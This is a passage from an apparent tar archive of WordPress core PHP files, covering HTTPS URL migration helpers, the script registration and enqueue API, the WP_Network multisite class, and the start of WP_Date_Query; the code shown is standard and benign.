$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
functions.wp-scripts-20260621093250.php 0000666 00000035717 15224151220 0012775 0 ustar 00 <?php
/**
* Dependencies API: Scripts functions
*
* @since 2.6.0
*
* @package WordPress
* @subpackage Dependencies
*/
/**
* Initializes $wp_scripts if it has not been set.
*
* @since 4.2.0
*
* @global WP_Scripts $wp_scripts
*
* @return WP_Scripts WP_Scripts instance.
*/
function wp_scripts() {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
$wp_scripts = new WP_Scripts();
}
return $wp_scripts;
}
/**
* Helper function to output a _doing_it_wrong message when applicable.
*
* @ignore
* @since 4.2.0
* @since 5.5.0 Added the `$handle` parameter.
*
* @param string $function_name Function name.
* @param string $handle Optional. Name of the script or stylesheet that was
* registered or enqueued too early. Default empty.
*/
function _wp_scripts_maybe_doing_it_wrong( $function_name, $handle = '' ) {
if ( did_action( 'init' ) || did_action( 'wp_enqueue_scripts' )
|| did_action( 'admin_enqueue_scripts' ) || did_action( 'login_enqueue_scripts' )
) {
return;
}
$message = sprintf(
/* translators: 1: wp_enqueue_scripts, 2: admin_enqueue_scripts, 3: login_enqueue_scripts */
__( 'Scripts and styles should not be registered or enqueued until the %1$s, %2$s, or %3$s hooks.' ),
'<code>wp_enqueue_scripts</code>',
'<code>admin_enqueue_scripts</code>',
'<code>login_enqueue_scripts</code>'
);
if ( $handle ) {
$message .= ' ' . sprintf(
/* translators: %s: Name of the script or stylesheet. */
__( 'This notice was triggered by the %s handle.' ),
'<code>' . $handle . '</code>'
);
}
_doing_it_wrong(
$function_name,
$message,
'3.3.0'
);
}
/**
* Prints scripts in document head that are in the $handles queue.
*
* Called by admin-header.php and {@see 'wp_head'} hook. Since it is called by wp_head on every page load,
* the function does not instantiate the WP_Scripts object unless script names are explicitly passed.
* Makes use of already-instantiated `$wp_scripts` global if present. Use provided {@see 'wp_print_scripts'}
* hook to register/enqueue new scripts.
*
* @see WP_Scripts::do_item()
* @since 2.1.0
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
* @param string|string[]|false $handles Optional. Scripts to be printed. Default 'false'.
* @return string[] On success, an array of handles of processed WP_Dependencies items; otherwise, an empty array.
*/
function wp_print_scripts( $handles = false ) {
global $wp_scripts;
/**
* Fires before scripts in the $handles queue are printed.
*
* @since 2.1.0
*/
do_action( 'wp_print_scripts' );
if ( '' === $handles ) { // For 'wp_head'.
$handles = false;
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__ );
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
if ( ! $handles ) {
return array(); // No need to instantiate if nothing is there.
}
}
return wp_scripts()->do_items( $handles );
}
/**
* Adds extra code to a registered script.
*
* Code will only be added if the script is already in the queue.
* Accepts a string `$data` containing the code. If two or more code blocks
* are added to the same script `$handle`, they will be printed in the order
* they were added, i.e. the latter added code can redeclare the previous.
*
* @since 4.5.0
*
* @see WP_Scripts::add_inline_script()
*
* @param string $handle Name of the script to add the inline script to.
* @param string $data String containing the JavaScript to be added.
* @param string $position Optional. Whether to add the inline script before the handle
* or after. Default 'after'.
* @return bool True on success, false on failure.
*/
function wp_add_inline_script( $handle, $data, $position = 'after' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
if ( false !== stripos( $data, '</script>' ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: <script>, 2: wp_add_inline_script() */
__( 'Do not pass %1$s tags to %2$s.' ),
'<code><script></code>',
'<code>wp_add_inline_script()</code>'
),
'4.5.0'
);
$data = trim( preg_replace( '#<script[^>]*>(.*)</script>#is', '$1', $data ) );
}
return wp_scripts()->add_inline_script( $handle, $data, $position );
}
/**
* Registers a new script.
*
* Registers a script to be enqueued later using the wp_enqueue_script() function.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
*
* @since 2.1.0
* @since 4.3.0 A return value was added.
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string|false $src Full URL of the script, or path of the script relative to the WordPress root directory.
* If source is set to false, script is an alias of other scripts it depends on.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
* @return bool Whether the script has been registered. True on success, false on failure.
*/
function wp_register_script( $handle, $src, $deps = array(), $ver = false, $args = array() ) {
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
$registered = $wp_scripts->add( $handle, $src, $deps, $ver );
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $handle, 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
$wp_scripts->add_data( $handle, 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $handle, 'fetchpriority', $args['fetchpriority'] );
}
return $registered;
}
/**
* Localizes a script.
*
* Works only if the script has already been registered.
*
* Accepts an associative array `$l10n` and creates a JavaScript object:
*
* "$object_name": {
* key: value,
* key: value,
* ...
* }
*
* @see WP_Scripts::localize()
* @link https://core.trac.wordpress.org/ticket/11520
*
* @since 2.2.0
*
* @todo Documentation cleanup
*
* @param string $handle Script handle the data will be attached to.
* @param string $object_name Name for the JavaScript object. Passed directly, so it should be qualified JS variable.
* Example: '/[a-zA-Z0-9_]+/'.
* @param array $l10n The data itself. The data can be either a single or multi-dimensional array.
* @return bool True if the script was successfully localized, false otherwise.
*/
function wp_localize_script( $handle, $object_name, $l10n ) {
$wp_scripts = wp_scripts();
return $wp_scripts->localize( $handle, $object_name, $l10n );
}
/**
* Sets translated strings for a script.
*
* Works only if the script has already been registered.
*
* @see WP_Scripts::set_translations()
* @since 5.0.0
* @since 5.1.0 The `$domain` parameter was made optional.
*
* @global WP_Scripts $wp_scripts The WP_Scripts object for printing scripts.
*
* @param string $handle Script handle the textdomain will be attached to.
* @param string $domain Optional. Text domain. Default 'default'.
* @param string $path Optional. The full file path to the directory containing translation files.
* @return bool True if the text domain was successfully localized, false otherwise.
*/
function wp_set_script_translations( $handle, $domain = 'default', $path = '' ) {
global $wp_scripts;
if ( ! ( $wp_scripts instanceof WP_Scripts ) ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return false;
}
return $wp_scripts->set_translations( $handle, $domain, $path );
}
/**
* Removes a registered script.
*
* Note: there are intentional safeguards in place to prevent critical admin scripts,
* such as jQuery core, from being unregistered.
*
* @see WP_Dependencies::remove()
*
* @since 2.1.0
*
* @global string $pagenow The filename of the current screen.
*
* @param string $handle Name of the script to be removed.
*/
function wp_deregister_script( $handle ) {
global $pagenow;
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
/**
* Do not allow accidental or negligent de-registering of critical scripts in the admin.
* Show minimal remorse if the correct hook is used.
*/
$current_filter = current_filter();
if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
( 'wp-login.php' === $pagenow && 'login_enqueue_scripts' !== $current_filter )
) {
$not_allowed = array(
'jquery',
'jquery-core',
'jquery-migrate',
'jquery-ui-core',
'jquery-ui-accordion',
'jquery-ui-autocomplete',
'jquery-ui-button',
'jquery-ui-datepicker',
'jquery-ui-dialog',
'jquery-ui-draggable',
'jquery-ui-droppable',
'jquery-ui-menu',
'jquery-ui-mouse',
'jquery-ui-position',
'jquery-ui-progressbar',
'jquery-ui-resizable',
'jquery-ui-selectable',
'jquery-ui-slider',
'jquery-ui-sortable',
'jquery-ui-spinner',
'jquery-ui-tabs',
'jquery-ui-tooltip',
'jquery-ui-widget',
'underscore',
'backbone',
);
if ( in_array( $handle, $not_allowed, true ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: 1: Script name, 2: wp_enqueue_scripts */
__( 'Do not deregister the %1$s script in the administration area. To target the front-end theme, use the %2$s hook.' ),
"<code>$handle</code>",
'<code>wp_enqueue_scripts</code>'
),
'3.6.0'
);
return;
}
}
wp_scripts()->remove( $handle );
}
/**
* Enqueues a script.
*
* Registers the script if `$src` provided (does NOT overwrite), and enqueues it.
*
* @see WP_Dependencies::add()
* @see WP_Dependencies::add_data()
* @see WP_Dependencies::enqueue()
*
* @since 2.1.0
* @since 6.3.0 The $in_footer parameter of type boolean was overloaded to be an $args parameter of type array.
* @since 6.9.0 The $fetchpriority parameter of type string was added to the $args parameter of type array.
*
* @param string $handle Name of the script. Should be unique.
* @param string $src Full URL of the script, or path of the script relative to the WordPress root directory.
* Default empty.
* @param string[] $deps Optional. An array of registered script handles this script depends on. Default empty array.
* @param string|bool|null $ver Optional. String specifying script version number, if it has one, which is added to the URL
* as a query string for cache busting purposes. If version is set to false, a version
* number is automatically added equal to current installed WordPress version.
* If set to null, no version is added.
* @param array|bool $args {
* Optional. An array of additional script loading strategies. Default empty array.
* Otherwise, it may be a boolean in which case it determines whether the script is printed in the footer. Default false.
*
* @type string $strategy Optional. If provided, may be either 'defer' or 'async'.
* @type bool $in_footer Optional. Whether to print the script in the footer. Default 'false'.
* @type string $fetchpriority Optional. The fetch priority for the script. Default 'auto'.
* }
*/
function wp_enqueue_script( $handle, $src = '', $deps = array(), $ver = false, $args = array() ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
$wp_scripts = wp_scripts();
if ( $src || ! empty( $args ) ) {
$_handle = explode( '?', $handle );
if ( ! is_array( $args ) ) {
$args = array(
'in_footer' => (bool) $args,
);
}
if ( $src ) {
$wp_scripts->add( $_handle[0], $src, $deps, $ver );
}
if ( ! empty( $args['in_footer'] ) ) {
$wp_scripts->add_data( $_handle[0], 'group', 1 );
}
if ( ! empty( $args['strategy'] ) ) {
$wp_scripts->add_data( $_handle[0], 'strategy', $args['strategy'] );
}
if ( ! empty( $args['fetchpriority'] ) ) {
$wp_scripts->add_data( $_handle[0], 'fetchpriority', $args['fetchpriority'] );
}
}
$wp_scripts->enqueue( $handle );
}
/**
* Removes a previously enqueued script.
*
* @see WP_Dependencies::dequeue()
*
* @since 3.1.0
*
* @param string $handle Name of the script to be removed.
*/
function wp_dequeue_script( $handle ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
wp_scripts()->dequeue( $handle );
}
/**
* Determines whether a script has been added to the queue.
*
* For more information on this and similar theme functions, check out
* the {@link https://developer.wordpress.org/themes/basics/conditional-tags/
* Conditional Tags} article in the Theme Developer Handbook.
*
* @since 2.8.0
* @since 3.5.0 'enqueued' added as an alias of the 'queue' list.
*
* @param string $handle Name of the script.
* @param string $status Optional. Status of the script to check. Default 'enqueued'.
* Accepts 'enqueued', 'registered', 'queue', 'to_do', and 'done'.
* @return bool Whether the script is queued.
*/
function wp_script_is( $handle, $status = 'enqueued' ) {
_wp_scripts_maybe_doing_it_wrong( __FUNCTION__, $handle );
return (bool) wp_scripts()->query( $handle, $status );
}
/**
* Adds metadata to a script.
*
* Works only if the script has already been registered.
*
* Possible values for $key and $value:
* 'strategy' string 'defer' or 'async'.
*
* @since 4.2.0
* @since 6.9.0 Updated possible values to remove reference to 'conditional' and add 'strategy'.
*
* @see WP_Dependencies::add_data()
*
* @param string $handle Name of the script.
* @param string $key Name of data point for which we're storing a value.
* @param mixed $value String containing the data to be added.
* @return bool True on success, false on failure.
*/
function wp_script_add_data( $handle, $key, $value ) {
return wp_scripts()->add_data( $handle, $key, $value );
}
class-wp-network-20260621141808.php 0000666 00000030010 15224151220 0012053 0 ustar 00 <?php
/**
* Network API: WP_Network class
*
* @package WordPress
* @subpackage Multisite
* @since 4.4.0
*/
/**
* Core class used for interacting with a multisite network.
*
* This class is used during load to populate the `$current_site` global and
* setup the current network.
*
* This class is most useful in WordPress multi-network installations where the
* ability to interact with any network of sites is required.
*
* @since 4.4.0
*
* @property int $id
* @property int $site_id
*/
#[AllowDynamicProperties]
class WP_Network {
/**
* Network ID.
*
* @since 4.4.0
* @since 4.6.0 Converted from public to private to explicitly enable more intuitive
* access via magic methods. As part of the access change, the type was
* also changed from `string` to `int`.
* @var int
*/
private $id;
/**
* Domain of the network.
*
* @since 4.4.0
* @var string
*/
public $domain = '';
/**
* Path of the network.
*
* @since 4.4.0
* @var string
*/
public $path = '';
/**
* The ID of the network's main site.
*
* Named "blog" vs. "site" for legacy reasons. A main site is mapped to
* the network when the network is created.
*
* A numeric string, for compatibility reasons.
*
* @since 4.4.0
* @var string
*/
private $blog_id = '0';
/**
* Domain used to set cookies for this network.
*
* @since 4.4.0
* @var string
*/
public $cookie_domain = '';
/**
* Name of this network.
*
* Named "site" vs. "network" for legacy reasons.
*
* @since 4.4.0
* @var string
*/
public $site_name = '';
/**
* Retrieves a network from the database by its ID.
*
* @since 4.4.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param int $network_id The ID of the network to retrieve.
* @return WP_Network|false The network's object if found. False if not.
*/
public static function get_instance( $network_id ) {
global $wpdb;
$network_id = (int) $network_id;
if ( ! $network_id ) {
return false;
}
$_network = wp_cache_get( $network_id, 'networks' );
if ( false === $_network ) {
$_network = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM {$wpdb->site} WHERE id = %d LIMIT 1", $network_id ) );
if ( empty( $_network ) || is_wp_error( $_network ) ) {
$_network = -1;
}
wp_cache_add( $network_id, $_network, 'networks' );
}
if ( is_numeric( $_network ) ) {
return false;
}
return new WP_Network( $_network );
}
/**
* Creates a new WP_Network object.
*
* Will populate object properties from the object provided and assign other
* default properties based on that information.
*
* @since 4.4.0
*
* @param WP_Network|object $network A network object.
*/
public function __construct( $network ) {
foreach ( get_object_vars( $network ) as $key => $value ) {
$this->__set( $key, $value );
}
$this->_set_site_name();
$this->_set_cookie_domain();
}
/**
* Getter.
*
* Allows current multisite naming conventions when getting properties.
*
* @since 4.6.0
*
* @param string $key Property to get.
* @return mixed Value of the property. Null if not available.
*/
public function __get( $key ) {
switch ( $key ) {
case 'id':
return (int) $this->id;
case 'blog_id':
return (string) $this->get_main_site_id();
case 'site_id':
return $this->get_main_site_id();
}
return null;
}
/**
* Isset-er.
*
* Allows current multisite naming conventions when checking for properties.
*
* @since 4.6.0
*
* @param string $key Property to check if set.
* @return bool Whether the property is set.
*/
public function __isset( $key ) {
switch ( $key ) {
case 'id':
case 'blog_id':
case 'site_id':
return true;
}
return false;
}
/**
* Setter.
*
* Allows current multisite naming conventions while setting properties.
*
* @since 4.6.0
*
* @param string $key Property to set.
* @param mixed $value Value to assign to the property.
*/
public function __set( $key, $value ) {
switch ( $key ) {
case 'id':
$this->id = (int) $value;
break;
case 'blog_id':
case 'site_id':
$this->blog_id = (string) $value;
break;
default:
$this->$key = $value;
}
}
/**
* Returns the main site ID for the network.
*
* Internal method used by the magic getter for the 'blog_id' and 'site_id'
* properties.
*
* @since 4.9.0
*
* @return int The ID of the main site.
*/
private function get_main_site_id() {
/**
* Filters the main site ID.
*
* Returning a positive integer will effectively short-circuit the function.
*
* @since 4.9.0
*
* @param int|null $main_site_id If a positive integer is returned, it is interpreted as the main site ID.
* @param WP_Network $network The network object for which the main site was detected.
*/
$main_site_id = (int) apply_filters( 'pre_get_main_site_id', null, $this );
if ( 0 < $main_site_id ) {
return $main_site_id;
}
if ( 0 < (int) $this->blog_id ) {
return (int) $this->blog_id;
}
if ( ( defined( 'DOMAIN_CURRENT_SITE' ) && defined( 'PATH_CURRENT_SITE' )
&& DOMAIN_CURRENT_SITE === $this->domain && PATH_CURRENT_SITE === $this->path )
|| ( defined( 'SITE_ID_CURRENT_SITE' ) && (int) SITE_ID_CURRENT_SITE === $this->id )
) {
if ( defined( 'BLOG_ID_CURRENT_SITE' ) ) {
$this->blog_id = (string) BLOG_ID_CURRENT_SITE;
return (int) $this->blog_id;
}
if ( defined( 'BLOGID_CURRENT_SITE' ) ) { // Deprecated.
$this->blog_id = (string) BLOGID_CURRENT_SITE;
return (int) $this->blog_id;
}
}
$site = get_site();
if ( $site->domain === $this->domain && $site->path === $this->path ) {
$main_site_id = (int) $site->id;
} else {
$main_site_id = get_network_option( $this->id, 'main_site' );
if ( false === $main_site_id ) {
$_sites = get_sites(
array(
'fields' => 'ids',
'number' => 1,
'domain' => $this->domain,
'path' => $this->path,
'network_id' => $this->id,
)
);
$main_site_id = ! empty( $_sites ) ? array_shift( $_sites ) : 0;
update_network_option( $this->id, 'main_site', $main_site_id );
}
}
$this->blog_id = (string) $main_site_id;
return (int) $this->blog_id;
}
/**
* Sets the site name assigned to the network if one has not been populated.
*
* @since 4.4.0
*/
private function _set_site_name() {
if ( ! empty( $this->site_name ) ) {
return;
}
$default = ucfirst( $this->domain );
$this->site_name = get_network_option( $this->id, 'site_name', $default );
}
/**
* Sets the cookie domain based on the network domain if one has
* not been populated.
*
* @todo What if the domain of the network doesn't match the current site?
*
* @since 4.4.0
*/
private function _set_cookie_domain() {
if ( ! empty( $this->cookie_domain ) ) {
return;
}
$domain = parse_url( $this->domain, PHP_URL_HOST );
$this->cookie_domain = is_string( $domain ) ? $domain : $this->domain;
if ( str_starts_with( $this->cookie_domain, 'www.' ) ) {
$this->cookie_domain = substr( $this->cookie_domain, 4 );
}
}
/**
* Retrieves the closest matching network for a domain and path.
*
* This will not necessarily return an exact match for a domain and path. Instead, it
* breaks the domain and path into pieces that are then used to match the closest
* possibility from a query.
*
* The intent of this method is to match a network during bootstrap for a
* requested site address.
*
* @since 4.4.0
*
* @param string $domain Domain to check.
* @param string $path Path to check.
* @param int|null $segments Path segments to use. Defaults to null, or the full path.
* @return WP_Network|false Network object if successful. False when no network is found.
*/
public static function get_by_path( $domain = '', $path = '', $segments = null ) {
$domains = array( $domain );
$pieces = explode( '.', $domain );
/*
* It's possible one domain to search is 'com', but it might as well
* be 'localhost' or some other locally mapped domain.
*/
while ( array_shift( $pieces ) ) {
if ( ! empty( $pieces ) ) {
$domains[] = implode( '.', $pieces );
}
}
/*
* If we've gotten to this function during normal execution, there is
* more than one network installed. At this point, who knows how many
* we have. Attempt to optimize for the situation where networks are
* only domains, thus meaning paths never need to be considered.
*
* This is a very basic optimization; anything further could have
* drawbacks depending on the setup, so this is best done per-installation.
*/
$using_paths = true;
if ( wp_using_ext_object_cache() ) {
$using_paths = get_networks(
array(
'number' => 1,
'count' => true,
'path__not_in' => '/',
)
);
}
$paths = array();
if ( $using_paths ) {
$path_segments = array_filter( explode( '/', trim( $path, '/' ) ) );
/**
* Filters the number of path segments to consider when searching for a site.
*
* @since 3.9.0
*
* @param int|null $segments The number of path segments to consider. WordPress by default looks at
* one path segment. The function default of null only makes sense when you
* know the requested path should match a network.
* @param string $domain The requested domain.
* @param string $path The requested path, in full.
*/
$segments = apply_filters( 'network_by_path_segments_count', $segments, $domain, $path );
if ( ( null !== $segments ) && count( $path_segments ) > $segments ) {
$path_segments = array_slice( $path_segments, 0, $segments );
}
while ( count( $path_segments ) ) {
$paths[] = '/' . implode( '/', $path_segments ) . '/';
array_pop( $path_segments );
}
$paths[] = '/';
}
/**
* Determines a network by its domain and path.
*
* This allows one to short-circuit the default logic, perhaps by
* replacing it with a routine that is more optimal for your setup.
*
* Return null to avoid the short-circuit. Return false if no network
* can be found at the requested domain and path. Otherwise, return
* an object from wp_get_network().
*
* @since 3.9.0
*
* @param null|false|WP_Network $network Network value to return by path. Default null
* to continue retrieving the network.
* @param string $domain The requested domain.
* @param string $path The requested path, in full.
* @param int|null $segments The suggested number of paths to consult.
* Default null, meaning the entire path was to be consulted.
* @param string[] $paths Array of paths to search for, based on `$path` and `$segments`.
*/
$pre = apply_filters( 'pre_get_network_by_path', null, $domain, $path, $segments, $paths );
if ( null !== $pre ) {
return $pre;
}
if ( ! $using_paths ) {
$networks = get_networks(
array(
'number' => 1,
'orderby' => array(
'domain_length' => 'DESC',
),
'domain__in' => $domains,
)
);
if ( ! empty( $networks ) ) {
return array_shift( $networks );
}
return false;
}
$networks = get_networks(
array(
'orderby' => array(
'domain_length' => 'DESC',
'path_length' => 'DESC',
),
'domain__in' => $domains,
'path__in' => $paths,
)
);
/*
* Domains are sorted by length of domain, then by length of path.
* The domain must match for the path to be considered. Otherwise,
* a network with the path of / will suffice.
*/
$found = false;
foreach ( $networks as $network ) {
if ( ( $network->domain === $domain ) || ( "www.{$network->domain}" === $domain ) ) {
if ( in_array( $network->path, $paths, true ) ) {
$found = true;
break;
}
}
if ( '/' === $network->path ) {
$found = true;
break;
}
}
if ( true === $found ) {
return $network;
}
return false;
}
}
class-wp-date-query.php 0000666 00000106463 15224151220 0011074 0 ustar 00 <?php
/**
* Class for generating SQL clauses that filter a primary query according to date.
*
* WP_Date_Query is a helper that allows primary query classes, such as WP_Query, to filter
* their results by date columns, by generating `WHERE` subclauses to be attached to the
* primary SQL query string.
*
* Attempting to filter by an invalid date value (eg month=13) will generate SQL that will
* return no results. In these cases, a _doing_it_wrong() error notice is also thrown.
* See WP_Date_Query::validate_date_values().
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @since 3.7.0
*/
#[AllowDynamicProperties]
class WP_Date_Query {
/**
* Array of date queries.
*
* See WP_Date_Query::__construct() for information on date query arguments.
*
* @since 3.7.0
* @var array
*/
public $queries = array();
/**
* The default relation between top-level queries. Can be either 'AND' or 'OR'.
*
* @since 3.7.0
* @var string
*/
public $relation = 'AND';
/**
* The column to query against. Can be changed via the query arguments.
*
* @since 3.7.0
* @var string
*/
public $column = 'post_date';
/**
* The value comparison operator. Can be changed via the query arguments.
*
* @since 3.7.0
* @var string
*/
public $compare = '=';
/**
* Supported time-related parameter keys.
*
* @since 4.1.0
* @var string[]
*/
public $time_keys = array( 'after', 'before', 'year', 'month', 'monthnum', 'week', 'w', 'dayofyear', 'day', 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second' );
/**
* Constructor.
*
* Time-related parameters that normally require integer values ('year', 'month', 'week', 'dayofyear', 'day',
* 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second') accept arrays of integers for some values of
* 'compare'. When 'compare' is 'IN' or 'NOT IN', arrays are accepted; when 'compare' is 'BETWEEN' or 'NOT
* BETWEEN', arrays of two valid values are required. See individual argument descriptions for accepted values.
*
* @since 3.7.0
* @since 4.0.0 The $inclusive logic was updated to include all times within the date range.
* @since 4.1.0 Introduced 'dayofweek_iso' time type parameter.
*
* @param array $date_query {
* Array of date query clauses.
*
* @type array ...$0 {
* @type string $column Optional. The column to query against. If undefined, inherits the value of
* the `$default_column` parameter. See WP_Date_Query::validate_column() and
* the {@see 'date_query_valid_columns'} filter for the list of accepted values.
* Default 'post_date'.
* @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=', '<', '<=',
* 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. Default '='.
* @type string $relation Optional. The boolean relationship between the date queries. Accepts 'OR' or 'AND'.
* Default 'OR'.
* @type array ...$0 {
* Optional. An array of first-order clause parameters, or another fully-formed date query.
*
* @type string|array $before {
* Optional. Date to retrieve posts before. Accepts `strtotime()`-compatible string,
* or array of 'year', 'month', 'day' values.
*
* @type string $year The four-digit year. Default empty. Accepts any four-digit year.
* @type string $month Optional when passing array.The month of the year.
* Default (string:empty)|(array:1). Accepts numbers 1-12.
* @type string $day Optional when passing array.The day of the month.
* Default (string:empty)|(array:1). Accepts numbers 1-31.
* }
* @type string|array $after {
* Optional. Date to retrieve posts after. Accepts `strtotime()`-compatible string,
* or array of 'year', 'month', 'day' values.
*
* @type string $year The four-digit year. Accepts any four-digit year. Default empty.
* @type string $month Optional when passing array. The month of the year. Accepts numbers 1-12.
* Default (string:empty)|(array:12).
* @type string $day Optional when passing array.The day of the month. Accepts numbers 1-31.
* Default (string:empty)|(array:last day of month).
* }
* @type string $column Optional. Used to add a clause comparing a column other than
* the column specified in the top-level `$column` parameter.
* See WP_Date_Query::validate_column() and
* the {@see 'date_query_valid_columns'} filter for the list
* of accepted values. Default is the value of top-level `$column`.
* @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=',
* '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. 'IN',
* 'NOT IN', 'BETWEEN', and 'NOT BETWEEN'. Comparisons support
* arrays in some time-related parameters. Default '='.
* @type bool $inclusive Optional. Include results from dates specified in 'before' or
* 'after'. Default false.
* @type int|int[] $year Optional. The four-digit year number. Accepts any four-digit year
* or an array of years if `$compare` supports it. Default empty.
* @type int|int[] $month Optional. The two-digit month number. Accepts numbers 1-12 or an
* array of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $week Optional. The week number of the year. Accepts numbers 0-53 or an
* array of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $dayofyear Optional. The day number of the year. Accepts numbers 1-366 or an
* array of valid numbers if `$compare` supports it.
* @type int|int[] $day Optional. The day of the month. Accepts numbers 1-31 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $dayofweek Optional. The day number of the week. Accepts numbers 1-7 (1 is
* Sunday) or an array of valid numbers if `$compare` supports it.
* Default empty.
* @type int|int[] $dayofweek_iso Optional. The day number of the week (ISO). Accepts numbers 1-7
* (1 is Monday) or an array of valid numbers if `$compare` supports it.
* Default empty.
* @type int|int[] $hour Optional. The hour of the day. Accepts numbers 0-23 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $minute Optional. The minute of the hour. Accepts numbers 0-59 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $second Optional. The second of the minute. Accepts numbers 0-59 or an
* array of valid numbers if `$compare` supports it. Default empty.
* }
* }
* }
* @param string $default_column Optional. Default column to query against. See WP_Date_Query::validate_column()
* and the {@see 'date_query_valid_columns'} filter for the list of accepted values.
* Default 'post_date'.
*/
public function __construct( $date_query, $default_column = 'post_date' ) {
if ( empty( $date_query ) || ! is_array( $date_query ) ) {
return;
}
if ( isset( $date_query['relation'] ) ) {
$this->relation = $this->sanitize_relation( $date_query['relation'] );
} else {
$this->relation = 'AND';
}
// Support for passing time-based keys in the top level of the $date_query array.
if ( ! isset( $date_query[0] ) ) {
$date_query = array( $date_query );
}
if ( ! empty( $date_query['column'] ) ) {
$date_query['column'] = esc_sql( $date_query['column'] );
} else {
$date_query['column'] = esc_sql( $default_column );
}
$this->column = $this->validate_column( $this->column );
$this->compare = $this->get_compare( $date_query );
$this->queries = $this->sanitize_query( $date_query );
}
/**
* Recursive-friendly query sanitizer.
*
* Ensures that each query-level clause has a 'relation' key, and that
* each first-order clause contains all the necessary keys from `$defaults`.
*
* @since 4.1.0
*
* @param array $queries
* @param array $parent_query
* @return array Sanitized queries.
*/
public function sanitize_query( $queries, $parent_query = null ) {
$cleaned_query = array();
$defaults = array(
'column' => 'post_date',
'compare' => '=',
'relation' => 'AND',
);
// Numeric keys should always have array values.
foreach ( $queries as $qkey => $qvalue ) {
if ( is_numeric( $qkey ) && ! is_array( $qvalue ) ) {
unset( $queries[ $qkey ] );
}
}
// Each query should have a value for each default key. Inherit from the parent when possible.
foreach ( $defaults as $dkey => $dvalue ) {
if ( isset( $queries[ $dkey ] ) ) {
continue;
}
if ( isset( $parent_query[ $dkey ] ) ) {
$queries[ $dkey ] = $parent_query[ $dkey ];
